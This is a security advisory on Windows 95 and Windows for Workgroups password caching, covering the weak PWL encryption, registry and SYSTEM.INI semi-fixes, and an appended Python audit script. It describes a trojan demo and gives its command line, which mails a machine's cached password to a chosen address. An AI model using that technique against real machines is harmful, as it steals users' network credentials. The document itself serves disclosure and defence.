DATE:
COMMAND:
SOURCE:
AUTHOR:

Password caching

SYSTEMS AFFECTED

Win 95, WfW

PROBLEM

This text is taken from the "Hack Microsoft" Web Site and is written by Frank Andrew Stevenson and Peter Gutmann.

By default, Windows 95 and Windows for Workgroups implement a "password caching feature" whereby the passwords for all network services (NetWare, NT, Samba, SLIP/PPP service) are automatically and permanently stored in C:\WINDOWS\<USERNAME>.PWL. Microsoft claims they are encrypted securely. Peter determined that the Windows PWL encryption algorithm was incredibly insecure. Frank wrote a program to break the .PWL files in Windows. (More details are forthcoming; a draft version is available currently.) Source code and a Windows NT executable for the exploit program are available. In effect, anyone with physical or network access to a Windows machine has access to all network passwords used by all users of that machine.

Late afternoon December 14th, Microsoft released an alleged fix for the problem, which is supposed to make passwords harder to find, but it has not been reviewed by outside experts, and it doesn't even come with a ReadMe file. Unlike Netscape, Microsoft has not published its encryption algorithm for the customary peer review. Until they do, we recommend disabling password caching and user profiles.

Peter wrote this modest trojan horse demonstration, mail.zip. Invoke it as

    mail firstname.lastname@example.org

(or whatever address you consider appropriate) on any Windows for Workgroups machine with a TCP/IP connection and it will send you (or anyone else) the first password cached on your machine, unencrypted. Note that this hack does not contain any decryption code; it merely uses the WNetGetCachedPassword() call, which is available to any program. Proper security architectures, such as the corresponding subsystem in Windows NT, have an internal security perimeter to prevent this kind of thing. This quick hack doesn't support MX aliasing, so you might need to point it directly at your SMTP server. Because some network calls do not seem to be supported in Windows 95, this program currently only works with WfW (but this is only a minor implementation issue, which could be fixed).

"Disabling password caching" does not completely address this vulnerability, because passwords are still stored in memory to facilitate the "automatic reconnect" feature, which is designed to maintain connections through laptop "suspend" mode and temporary network problems. Neither is the alleged fix for Windows 95 (above) relevant.

EXPLOIT

SOLUTION

Don't allow your network administrators to log on to workstations with the "administrator" account under any circumstances. When you log on to a standard Windows workstation, your user passwords are cached -- unless this feature has been disabled.

Thanks to Jim Carlson for contributing this WfW semi-fix: To turn off password caching for Windows for Workgroups, add the following to your \WINDOWS\SYSTEM.INI file:

    [NETWORK]
    passwordcaching=no

Thanks to Malcolm Miles for contributing this Win95 semi-fix: To turn off password caching for Win95, you can use Policy Editor, or edit the following Registry entry directly with REGEDIT.EXE:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network\DisablePwdCaching

Set the value to a binary value of 1.
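The two semi-fixes above are easy to get subtly wrong (wrong section, wrong key, value left at 0). The following audit script is an added example, not code from the advisory or its authors: it checks a SYSTEM.INI text for the WfW setting and a REGEDIT4 export text for the Win95 DisablePwdCaching value, accepting the binary value the advisory names as well as a DWORD 1 as Policy Editor writes it. All sample inputs are constructed; the .reg-export parsing is an assumption about how the value would be inspected offline.

```python
"""Audit whether Windows 95 / WfW network password caching is disabled."""
import re

# Registry key from the advisory; the value of interest is DisablePwdCaching.
REG_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network"


def parse_ini(text):
    """Minimal SYSTEM.INI parser: {section: {key: value}}, case-insensitive names."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def wfw_caching_disabled(system_ini_text):
    """True only when [NETWORK] passwordcaching=no is present; caching is on by default."""
    net = parse_ini(system_ini_text).get("network", {})
    return net.get("passwordcaching", "").lower() == "no"


def win95_caching_disabled(reg_export_text):
    """True only when DisablePwdCaching under the Policies\\Network key equals 1."""
    in_key = False
    for raw in reg_export_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == REG_KEY.lower()  # ignore same-named values elsewhere
            continue
        m = re.match(r'"DisablePwdCaching"\s*=\s*(.+)$', line, re.IGNORECASE) if in_key else None
        if not m:
            continue
        value = m.group(1).strip().lower()
        if value.startswith("dword:"):
            return int(value[6:], 16) == 1
        if value.startswith("hex:"):  # binary value: first octet 1, any remaining octets 0
            octets = [int(b, 16) for b in value[4:].split(",") if b.strip()]
            return bool(octets) and octets[0] == 1 and all(o == 0 for o in octets[1:])
        return False  # string or other type: not the documented setting
    return False  # value absent: caching stays enabled


# Constructed samples: a default SYSTEM.INI, the fixed one, and two .reg exports.
SYSTEM_INI_DEFAULT = "[boot]\nshell=explorer.exe\n[network]\ncomputername=LAB1\n"
SYSTEM_INI_FIXED = SYSTEM_INI_DEFAULT + "passwordcaching=no\n"
REG_FIXED = f'REGEDIT4\n\n[{REG_KEY}]\n"DisablePwdCaching"=hex:01,00,00,00\n'
REG_WRONG_KEY = 'REGEDIT4\n\n[HKEY_CURRENT_USER\\Software\\Example]\n"DisablePwdCaching"=hex:01\n'

if __name__ == "__main__":
    print("WfW default:", wfw_caching_disabled(SYSTEM_INI_DEFAULT), "fixed:", wfw_caching_disabled(SYSTEM_INI_FIXED))
    print("Win95 fixed:", win95_caching_disabled(REG_FIXED), "wrong key:", win95_caching_disabled(REG_WRONG_KEY))
```

Even when both checks pass, the advisory's caveat stands: cached passwords remain in memory for automatic reconnect, so this only confirms the on-disk caching setting.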